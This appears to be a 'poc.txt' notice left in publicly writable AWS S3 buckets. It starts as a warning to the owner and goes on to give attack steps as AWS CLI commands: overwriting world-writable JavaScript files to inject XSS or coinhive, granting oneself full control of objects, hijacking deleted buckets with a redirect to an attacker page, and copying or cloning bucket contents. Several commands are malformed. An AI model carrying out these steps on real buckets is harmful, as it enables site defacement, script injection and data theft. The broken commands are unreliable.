If you are reading this then there is a chance you have a poc.txt in your s3 bucket.
This is just a little heads up to say attackers can upload and overwrite files in your s3 bucket and if you are serving up files like JS they can add an XSS or coinhive to your js.
If you login to your AWS console find the bucket please remove the public-write permission from the bucket and this will fix the issue.
You will need the AWS cli installed and configured!
aws s3api get-bucket-acl --bucket bucketname
if you see the following then you have problems!
{
"Permission": "FULL_CONTROL",
"Grantee": {
"URI": "http://acs.amazonaws.com/groups/global/AllUsers",
"Type": "Group"
}
Login in to your AWS console and remove the public-write permission ASAP.
aws s3 poc.txt s3://bucketname --region us-east-2 --acl public-read
Change the region of the bucket if it's not in us-east-2.
If you see an error then the bucket does not allow public uploads.
On the rare occasion you can test files for ALLUsers control. This means the bucket is not writeable but the file is!
You can find this out by doing
aws s3api get-object-acl --bucket bucketname --key jquery.js
if you see ALLUsers FULL_CONTROL then you can overwrite this file!!
to do this you need to do the following command
aws s3api put-object-acl --bucket bucketname --key jquery.js --grant-full-control emailaddress=YOURAWSEMAILADDRESS --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers
now all you do is download the file alter it and reupload it
aws s3 jquery.js s3://bucketname --region us-east-2 --acl public-read
Sometimes when you visit a website you might see NoSuchBucket which means the s3 bucket that had the files on for that site is no longer around and has been deleted you can easily hijack this by creating the bucket.
Create the Bucket
aws s3api create-bucket --bucket bucketname --acl public-read --region us-east-1
redirect.json
{
"RedirectAllRequestsTo": {
"HostName": "takeover.xsses.rocks"
}
}
Change the hostname to youre take over page.
aws s3api put-bucket-website --bucket bucketname --website-configuration file://redirect.json
The website will now redirect to your webpage.
Change the mybucket and the file to what ever you want and this will download the file to your /tmp/ folder/
aws s3 cp s3://mybucket/one-central/js/qa.js /tmp/
This will clone everything you have permission to view on to your machine.
aws sync s3://mybucket --recursive